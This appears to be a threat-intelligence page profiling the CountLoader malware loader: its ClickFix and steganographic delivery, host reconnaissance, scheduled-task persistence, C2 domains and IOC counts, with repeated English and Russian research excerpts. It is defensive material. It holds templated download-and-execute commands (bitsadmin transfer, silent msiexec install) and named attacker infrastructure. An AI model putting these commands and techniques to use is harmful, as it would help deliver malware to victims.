CountLoader is a multi-stage malware loader targeting Windows, with later variants also targeting macOS. It commonly uses obfuscated HTA and JavaScript executed through MSHTA, PowerShell, and in-memory shellcode execution to retrieve and launch follow-on payloads. Observed payloads include information stealers, cryptocurrency clippers, and other secondary malware.
CountLoader profiles infected hosts, collecting operating-system, hardware, security-product, domain-membership, browser-extension, cryptocurrency-wallet, and Signal Desktop information. It uses a custom encrypted command-and-control protocol and JWT-authenticated tasking to download or execute executables, DLLs, MSI packages, HTA content, PowerShell, and other payloads. Windows variants establish persistence through scheduled tasks; macOS variants use LaunchAgents. Some variants evade analysis by checking sandbox or security-product artifacts, altering execution chains based on endpoint security products, deleting artifacts, and executing payloads in memory.
Campaigns have distributed CountLoader through trojanized and cracked software downloads, SEO-poisoned or fraudulent software sites, malicious archives containing abused legitimate Python components, disguised HTML Applications, removable media, and ClickFix lures. In ClickFix operations, it has been delivered through browser-cached steganographic images and fake verification prompts. CountLoader can propagate through removable drives by replacing files with malicious shortcut files. Its wallet and browser-extension reconnaissance, Active Directory reconnaissance capability, and flexible secondary-payload delivery make it relevant to both cryptocurrency theft and enterprise post-compromise activity.
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
1 CVE Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
CountLoader — previously investigated by BGI — distributes via a filename specifically designed to lure security researchers: source code of carbanak backdoor discovered.exe . | CountLoader's secondary C2 at burning-edge[.]sbs ( 65.21.174[.]205 , Hetzner) has phpMyAdmin exposed at /phpmyadmin/ , MySQL on port 3306, and 120+ CVEs including regreSSHion.
37 distinct techniques documented for this family, organized by ATT&CK tactic.
The loader also verifies whether CrowdStrike Falcon service is active by querying the antivirus list via WMI.
проверяет наличие Signal Desktop и закрепляется в системе через планировщик задач или LaunchAgent.
CountLoader creates persistence using Scheduled Task with name "GoogleTaskSystem136.0.7023.12" + <GUID-like string>.
с помощью findstr или certutil извлекает из изображения скрытый JavaScript, VBScript или PowerShell-код, который запускает дроппер второго этапа.
11 Executes a remote PowerShell payload by downloading and in-memory executing it via Invoke-RestMethod piping to Invoke-Expression.
с помощью findstr или certutil извлекает из изображения скрытый JavaScript, VBScript или PowerShell-код
с помощью findstr или certutil извлекает из изображения скрытый JavaScript, VBScript или PowerShell-код
bitsadmin.exe /transfer "<job>" /download /priority foreground "<url>" "<out>"
Его клиенты проводят ClickFix-атаки, скрывая вредоносный код в PNG-изображениях, которые заранее загружаются в кеш браузера жертвы.
проверяет наличие Signal Desktop и закрепляется в системе через планировщик задач или LaunchAgent.
CountLoader creates persistence using Scheduled Task with name "GoogleTaskSystem136.0.7023.12" + <GUID-like string>.
Для расшифровки финального пейлоада используется публичный IPv4-адрес жертвы: на его основе формируется ключ для кастомного потокового шифра на базе SHA-256 в режиме CTR с XOR.
The campaign deploys an updated CountLoader and the newly identified DeviceManager RAT, which leverage advanced techniques such as Windows binary patching and blockchain-based C2 resolution.
скрывая вредоносный код в PNG-изображениях... хостит картинки со скрытыми при помощи стеганографии пейлоадами
CountLoader establishes persistence through scheduled tasks and can copy, rename, and modify the PE metadata of legitimate Windows utilities, including conhost.exe, powershell.exe, and mshta.exe, to execute commands while masquerading as trusted applications.
clean up persistence mechanisms likely to erase forensic evidence... If a target CIS language is detected, DeviceManager executes a self-deletion routine: it removes its scheduled task, deletes its installation directory via cmd.exe, and terminates process execution.
bitsadmin.exe /transfer "<job>" /download /priority foreground "<url>" "<out>"
Upon execution, MSHTA retrieves and runs an obfuscated variant of the CountLoader v3.2.
Downloads an MSI installer and performs a silent install under the current user context. msiexec.exe /i "<UserProfile>\package.msi" /quiet /qn
Collects and exfiltrates extensive system/domain reconnaissance (computer role, domain/forest data, current user group memberships, Domain Admins members, domain computers).
Он собирает сведения о системе... В остальных случаях троян собирает GUID машины, SID пользователя, имя хоста, версию ОС, а также данные об архитектуре, установленном антивирусе и домене.
Collects and exfiltrates extensive system/domain reconnaissance (computer role, domain/forest data, current user group memberships, Domain Admins members, domain computers).
Collects and exfiltrates extensive system/domain reconnaissance (computer role, domain/forest data, current user group memberships, Domain Admins members, domain computers).
The malware provides operators with persistence, system reconnaissance, command execution, payload delivery, and resilient command and control capabilities.
The script identifies an active C2 by sending POST requests to domains in the format globalsnn{i}-new[.]cc.
Также этот загрузчик способен скачивать и запускать MSI-пакеты, DLL, PowerShell-модули и другие файлы... загрузки новых пейлоадов.
In short, a random six-digit key is generated and used as an XOR key to encode the Base64 representation of the plaintext.
255 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
32 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Windows-focused information stealer used as the initial payload in Operation RepoGhost.
Updated Windows and macOS loader that profiles the system, searches for cryptocurrency wallet applications and browser extensions, checks for Signal Desktop, establishes persistence via Task Scheduler or LaunchAgent, and can download and execute MSI packages, DLLs, PowerShell modules, and other files.
A loader delivered by DOUBLECUP that establishes persistence via scheduled tasks and can copy, rename, and modify PE metadata of legitimate Windows utilities to masquerade as trusted applications while executing commands. It also profiles infected systems, including OS details, antivirus, domain membership, Signal Desktop, cryptocurrency wallets, and browser extensions.
An updated loader deployed by the DOUBLECUP campaign as a follow-on payload.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.